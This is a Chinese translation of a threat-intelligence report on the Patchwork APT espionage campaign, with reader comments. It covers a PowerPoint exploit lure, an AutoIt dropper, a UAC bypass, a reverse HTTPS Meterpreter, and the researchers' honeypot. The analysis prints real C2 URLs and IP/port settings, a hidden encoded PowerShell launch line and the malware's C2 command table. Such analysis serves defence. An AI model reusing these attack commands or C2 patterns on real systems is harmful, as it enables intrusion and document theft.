最近,一個與東南亞和中國南海問題相關的APT攻擊被發現,該APT攻擊以包括美國在内的各國政府和公司為目标 。經安全專家分析,該APT攻擊所使用的全部工具代碼都是通過 複制-粘貼 網際網路公開代碼組合而成,相對于其它APT特有的攻擊工具而言,比較獨特。
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsICbsFWbzFyZwpmL2kjMzQjM3EDO5cjN0EzLchDM3AjNxAjMvw1cldWYtl2LcRXZu5SMwAzMuU2Zh1Wavw1LcpDc0RHaiojIsJye.jpg!small)
Cymmetria發現并釋出了此APT攻擊的分析報告,由于其代碼來源于多個網絡論壇和網站,如Github、暗網和隐秘的犯罪論壇等,故把其命名為Patchwork APT 攻擊(Patchwork:拼湊物)。
一、報告綜述
Patchwork APT自2015年12月被監測到之後,目前已經感染了大約2500台電腦,雖有迹象表明其最早活動可追溯至2014年,但Cymmetria并未第一時間發現。
Patchwork APT針對的目标是軍事和政治機構,特别是那些與東南亞和南海問題相關的工作機構雇員,目标多是政府或與政府有間接聯系的機構。
在存活的受害者系統上,Patchwork APT通過搜尋文檔并上傳至其C&C伺服器,如果目标主機非常有價值,Patchwork APT還會進一步安裝第二階段滲透工具。
以下為PatchworkAPT 的攻擊時間範圍:
二、調查
1 概述
該APT攻擊于今年5月在針對歐洲政府部門的一起釣魚活動中被發現,攻擊目标為一個中國政策研究機構的從業人員,其以PPT文檔為誘餌發起網絡攻擊,文檔内容為中國在南海的一系列活動。
當PPT文檔被打開後,嵌入執行CVE-2014-4114漏洞代碼,這個漏洞存在于未打更新檔的 Office PowerPoint 2003 和2007中,漏洞利用代碼曾被發起了名為 Sandworm的APT 攻擊。
一旦漏洞代碼開始執行,第一階段為部署攻擊載體:一個利用AutoIt工具編譯的腳本。這個腳本使用某網絡論壇出現的名為UACME方法和代碼來繞過系統UAC。
獲得更高權限之後,以Meterpreter方式執行powersploit 腳本,(Meterpreter是著名的metasploit架構遠控工具)
下一階段,開始對文檔和目标主機價值進行篩選判斷,如果目标足夠有價值,攻擊者再次部署第二階段攻擊子產品,涉及到的攻擊工具也大多來源于知名論壇或網絡資源。以下為其攻擊感染流程:
2 以蜜罐方式發現攻擊者
為了捕獲攻擊者發起的第二階段攻擊程式,觀察其在内網中的滲透活動,我們建立了一個真實網絡環境,這個環境讓攻擊者覺得他們已經成功擷取了主機權限。
零星的誘餌資料可以讓攻擊者向另一主機轉移,這些資料可以是存儲憑據,共享檔案夾、浏覽器cookies,VPN配置等其它資訊。最終我們利用了Cymmetria’s MazeRunner 系統成功捕獲了攻擊者的活動。
3 開始
如前所述,為了保證攻擊者的攻擊持續處于活動狀态,我們虛構了對攻擊者來說非常感興趣的目标:一位處理安全問題的政府智庫人員。
建立欺騙網絡
• 首先,建立SMB共享,映射到目标電腦并顯示網絡備份;
• 其次,把一個運作雲端服務的RDP憑據存放于電腦中,同時在遠端雲端系統中部署欺騙資料,形成蜜罐系統,同時造成正常服務的假象。
蜜罐檔案系統
用 RDP憑據引向蜜罐系統
4 一連串的事件
(1) 當一個 PowerPoint PPS檔案被打開之後,釋放有效攻擊載荷。即CVE-2014-4114漏洞利用代碼(曾用作SandWorm沙蟲攻擊)。
釋放的Driver.inf 檔案内容
(2) 主機被以下可執行檔案感染:
• sysvolinfo.exe – 執行編譯腳本.
• PowerShell 以 HTTPS Meterpreter方式執行攻擊腳本 ,同時保持與C2控制伺服器連接配接,發起以下網絡請求:
http://212.129.13.110/dropper.php?profile=<base64of [[email protected]]>
https://45.43.192.172:8443/OxGN
(3) 目标電腦上的檔案被攻擊者以加密通道方式上傳至遠端控制伺服器,由于Meterpreter的“sstagerverifysslcert”功能 開啟,是以我們沒有檢測到相應的SSL通道;
(4) 攻擊者釋放第二階段惡意軟體7zip.exe,利用此程式掃描硬碟并連接配接遠端IP位址 212.83.191.156。
(5)7zip.exe複制自身在C:\Windows\SysWOW64\目錄下生成netvmon.exe檔案,并添加程序式自啟動路徑,實作長期控制目的。
(6)在最初感染的前三天,攻擊者開始對SMB共享檔案夾發起通路;
(7)惡意軟體開始通路映射共享,并掃描所有固定磁盤驅動器上的檔案;
(8)在MazeRunner 系統的第一個警報産生之後,由于誘餌系統的IP位址被内置在RDP憑據檔案裡,是以,我們看到了攻擊者試圖利用RDP憑據連接配接誘餌系統的資料。警報提示攻擊發起于
IP 212.129.7.146,整個攻擊持續了12分鐘;
(9)從我們收到Mazerunner的警報綜合受害主機内的RDP連接配接檔案表明,攻擊者登入失敗了幾次,但讓我們感興趣的是,攻擊者并沒有使用系統密碼擷取工具Mimikatz。
(10)我們相信以上兩起攻擊連接配接發起于同一個攻擊源,因為:
• 攻擊者用來連接配接我們蜜罐系統的兩個IP位址都屬于rev.poneytelecom.euf 域名;
• 内部警報表明,兩起攻擊連接配接事件發生在同一天。
攻擊發起的網絡規劃圖
5 從攻擊者C&C控制伺服器中獲得的資訊
我們通過另一個合作夥伴,成功地接手并控制了攻擊者的一個C&C伺服器,伺服器中包含了大量檔案:
• 種類多樣的PPS檔案–用作釣魚攻擊的惡意檔案
• 大量的惡意代碼包
而且這些釣魚檔案内容都與中國主題或色情性質相關,以下是一些樣本檔案:
在C&C伺服器中,我們還提取到了PPS檔案的修改日期,這些日期從2015年12月持續到2016年1月。從日期上可以清晰看出攻擊者準備和實施攻擊的時間線。
三、技術分析
工具部署
攻擊載體:
攻擊載體是一個以PPS為附件的網絡釣魚郵件,嵌入漏洞 CVE-2014-4114 的利用代碼。漏洞利用代碼執行之後釋放可執行檔案和Windows驅動程式描述檔案INF。
攻擊者把以下兩個檔案嵌入OLE實體中并釋放到受害者主機:
• Driver.inf
• Sysvolinfo.exe
DROPPER木馬程式:
sysvolinfo.exe程式是攻擊者第一階段的有效載荷(另一個程式是uplv1032 .exe),其目的是為了提升權限、篩選資料,從網絡下載下傳執行powersploit發起的程式和指令。通過安裝Meterpreter,攻擊者可以在受感染主機内發起遠端控制指令。
sysvolinfo.exe代碼本身是利用編譯工具AutoIt編譯的,其代碼的一個重要部分抄襲于黑客論壇“ indetectables ”。
C&C通信:
當黑客工具開始運作之後,第一步就是與C&C伺服器進行确認連接配接,靜待指令,以下就是對C&C連接配接協定的分析:
屬性:
ComputerID=BASE64ENCODE(“[email protected]$COMPUTERNAME”)
ddager= Isstartup registry key added (Bool)
r1=BASE64ENCODE(result of OSVersion macro, e.g. WIN_7)
r2=BASE64ENCODE(result of OSArch macro, e.g. X64)
r3=BASE64ENCODE(trojan version, in our sample)
r4=BASE64ENCODE(Does the SQLite database folder ( @UserProfileDir &“\AppData\Local\Google\Chrome\User Data\Default\”) exist () or not ())
r5=BASE64ENCODE(stdout of last cmd command)
r6=BASE64ENCODE( if running as administrator, if not)
發起遠端連接配接請求:
-- http://212.129.13.110/dropper.php?profile=+ $ComputerID
用以下變量作為發送參數:
傳回變量和結果:
-- “$sdata|$payload”
可用指令解釋:
Command ID | Command explanation |
---|---|
“1” | 調試伺服器遠端狀态如 “[+] ServFlag : Disabled” ,也可以什麼都不做 |
“2” | 如果此指令在之前沒被執行過, 以PowerShell腳本方式執行: powershell -nop -wind hidden -noni -enc ” & $PAYLOAD |
“3” | 重置腳本内部狀态,忽略先前執行的“2”号指令,再次執行“2”号指令。 |
“4” | 退出腳本 |
“5” | 以base64加密payload執行_emorhc function |
“6” | 以base64加密payload為變量執行_getnewver function |
“7” | 以base64加密payload為變量執行_instcust function |
“8” | 通過CMD方式執行base64加密payload ,把結果儲存于r5 |
當受害主機狀态指令發送到控制伺服器後,黑客程式繼續以“TotalSecurity”字元串目标掃描整個“Program Files”目錄,這是“360 Total Security”安全軟體的安裝目錄。(360 Total Security 是360的國際版)
黑客軟體以”Baidu Software Update”為檔案夾僞裝自身進入系統啟動目錄(HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)。然後,它又向控制伺服器發送另一個指令,之後,開始掃描計算機中的所有固定驅動器磁盤,以尋找以下字尾名檔案:
*.doc
*.pdf
*.csv
*.ppt
*.docx
*.pst
*.xls
*.xlsx
*.pptx
之後上傳所有檔案至伺服器:
在對黑客工具進行反編譯後,發現了其功能調用中包含了一個有趣的PDB檔案:
提權操作:
經過前階段描述可知,攻擊載體使用了WINDOWS7系統中尚未打更新檔的UAC繞過漏洞(被稱為UACME ),這可以讓攻擊者以管理者身份執行操作。
shellcode執行:
當AutoIt 腳本惡意軟體從 $sdata 中接收到“2”号指令的心跳後(這似乎是最常見的情況),便以base64加密方式執行指令:
powershell -nop -wind hidden -noni -enc
我們觀察到base64加密的payload是powershell腳本方式的shellcode,通過Meterpreter 進行https反向遠端連接配接。
反向HTTPS Meterpreter 連接配接:
AutoIt腳本提權并執行一個PowerShell的反向Meterpreter 連接配接腳本,而且這個腳本看起來是通過一個線上部落格複制而來的
Meterpreter用以下參數進行連接配接:
• LHOST=45.43.192.172
• LPORT=8443
第二階段的攻擊載體:
該階段的攻擊工具隻有在攻擊者執行Meterpreter連接配接,并确定目标主機具有價值之後,才會運作部署。我們發現這個攻擊載體為7zip.exe,但它有時候也為ndcrypt.exe和nd.exe。
7zip.exe 16 進制代碼
這個程式的很多代碼都來源于GitHub的一個公開代碼庫 。
脫殼之後,程式子產品執行以下動作:
(1)為了在電腦關機或重新開機之後能繼續保持入侵狀态,攻擊載體程式在系統目錄下複制自身并重命名為netmon.exe,并以自啟動服務 Net Monitor 運作。
C:\Windows\SysWOW64\netmon.exe — 以 7zip.exe/netmon.exe 運作的64位程式;
(2)執行一個固定磁盤的掃描線程和檔案篩選程式(但不會搜尋網絡驅動器和USB裝置)
• 另一個線程執行檔案上傳功能:
• 另一個線程下載下傳可執行檔案:
四、其它屬性
1 PPS檔案時間編輯分析:
經過對PPS檔案的提取分析發現,這些PPS檔案在一天當中的不同時段都被經過修改:
2 C&C 遠端控制伺服器活動時間:
C&C伺服器的活動不僅在于單獨的幾個小時之間,還在于每周的每天,通過對每天的時間區間進行描述之後,我們可以發現不同的模式,例如,每周的周日活動較多,周六較少。另外,攻擊活動不早于淩晨2點,不晚于上午11點,除了某個周日之外。“攻擊工作時間”圖如下:
3 域名注冊時間:
攻擊活動使用的惡意域名注冊時間隻在每周的特定幾天,而且注冊時間都介于淩晨3點到下午15點之間:
五、總結:
Patchwork APT 是一個非常成功的有針對性的網絡攻擊,令人驚訝的是自去年12月之前,它一直未被發現。
其高度複雜的操作與其具有的低技術含量形成鮮明的沖突對比,避免昂貴的開發工具而選擇開源低廉的代碼作為滲透工具,這也許是一種攻擊趨勢,也是一種避免被發現的手段;
根據我們所掌握的資訊,攻擊者有可能是親印度或印度人。但就像我們的CEO Gadi Gadi Evron在内部讨論時所說的:“也有另一種可能性,有可能是其他僞裝成印度人的攻擊者,因為在網絡世界裡,好像根本就沒有任何确切的證據來支撐說明,這隻是我們自己的觀點。”
不像其它國家發起的APT攻擊,印度的網絡間諜活動一直都處于平靜狀态,如果攻擊者确實是親印度或印度人,那麼這是非常值得注意的情況。
卡巴斯基實驗室中文報告
卡巴斯基實驗室英文報告
***** 文章根據Cymmetria 報告原文編譯:Cymmetria - Unveiling_Patchwork
*****後記:在Cymmetria釋出分析報告的同時,卡巴斯基實驗室也釋出了名為《Dropping Elephant網絡犯罪組織肆意攻擊多國政府和外交機構》的報告,報告中命名的Dropping Elephant APT 與Cymmetria發現的 Patchwork APT 高度相似。
*本文譯者:clouds,轉載須注明來自FreeBuf黑客與極客(FreeBuf.COM)
收藏該文
clouds9篇文章等級:4級
獨立網絡安全研究員
個人首頁 發私信
- 上一篇:RDP連接配接降級攻擊以及規避方法解析
- 下一篇:不解密資料竟也能識别TLS加密的惡意流量?
這些評論亮了
- xxx 回複 http://cn.technode.com/post/2014-08-14/tcbj-coin/ ,百度了一下系統使用者名,好像也是印度人 ) 7 ( 亮了
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 - Anonymous某 (1級) 回複 翻譯有誤,是通過PowerShell腳本加載起Meterpreter而不是Meterpreter加載Powershel腳本l ) 7 ( 亮了
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 -
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 Anonymous某 (1級) 回複 原文為
This PowerShell script executed an additional payload, which was a PowerSploit script used to invoke shellcode containing a reverse HTTPS Meterpreter. ) 7 ( 亮了
- clouds (4級) 獨立網絡安全研究員 回複 @ Anonymous某 SORRY ,謝謝提醒,修訂為“ 這個PowerShell腳本還執行了另外一個由Meterpreter https連接配接的包含有shellcode的payload” ) 7 ( 亮了
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 - taylorwin (5級) 回複 好玩 ) 7 ( 亮了
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711
發表評論
已有 7 條評論
-
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 ArthurKiller (5級) FreeBuf的隔壁鄰居------老王 2016-07-11 回複 1樓
我們通過另一個合作夥伴,成功地接手并控制了攻擊者的一個C&C伺服器
事實證明,從伺服器廠商租用伺服器做C&C都是不靠譜的,還是黑服靠譜。
但好奇的是APT攻擊者到底是誰?還有研究人員好會玩心計,搞台蜜罐給人家。。。。
亮了( 6)
-
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 taylorwin (5級) 2016-07-11 回複
好玩
亮了( 7)
-
-
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 xxx 2016-07-11 回複 2樓
http://cn.technode.com/post/2014-08-14/tcbj-coin/ ,百度了一下系統使用者名,好像也是印度人
亮了( 7)
-
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 Anonymous某 (1級) 2016-07-11 回複 3樓
翻譯有誤,是通過PowerShell腳本加載起Meterpreter而不是Meterpreter加載Powershel腳本l
亮了( 7)
-
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 Anonymous某 (1級) 2016-07-11 回複
原文為
This PowerShell script executed an additional payload, which was a PowerSploit script used to invoke shellcode containing a reverse HTTPS Meterpreter.
亮了( 7)
-
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 clouds (4級) 獨立網絡安全研究員 2016-07-11 回複
@ Anonymous某 SORRY ,謝謝提醒,修訂為“ 這個PowerShell腳本還執行了另外一個由Meterpreter https連接配接的包含有shellcode的payload”
亮了( 7)
-
-
-
揭秘Patchwork APT攻擊 :一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711 Asiaidc.net (1級) 亞洲資料中心 - 夢想無界, 關聯未來 2016-07-15 回複 4樓
攻擊看上去的确非常的複雜。